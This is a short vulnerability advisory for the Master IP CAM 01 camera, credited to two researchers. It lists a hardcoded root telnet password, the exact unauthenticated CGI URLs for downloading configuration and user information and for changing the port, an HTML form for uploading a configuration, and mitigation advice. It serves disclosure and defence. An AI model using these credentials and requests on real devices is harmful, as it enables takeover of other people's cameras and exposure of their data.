vendor:
Master IP CAM 01
by:
Daniele Linguaglossa, Raffaele Sabato
9.8
CVSS
CRITICAL
Hardcoded Password for Root Account, Unauthenticated Configuration Download and Upload, Unauthenticated Configuration Change, Unauthenticated Sensitive Information Disclousure
798, 521, 200, 319
CWE
Product Name: Master IP CAM 01
Affected Version From: 3.3.4.2103
Affected Version To: 3.3.4.2103
Patch Exists: YES
Related CWE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
CPE: h:master_ip_cam:master_ip_cam_01
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2018
Master IP CAM 01 Multiple Vulnerabilities
The Master IP CAM 01 suffers of multiple vulnerabilities: Is possible to access telnet with the hardcoded credential root:cat1029. Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi. Upload Form: <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form>. Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080. List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf. Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser.
Mitigation:
Ensure that the root account is not using a hardcoded password. Ensure that authentication is required for configuration download and upload. Ensure that authentication is required for configuration change. Ensure that authentication is required for sensitive information disclosure.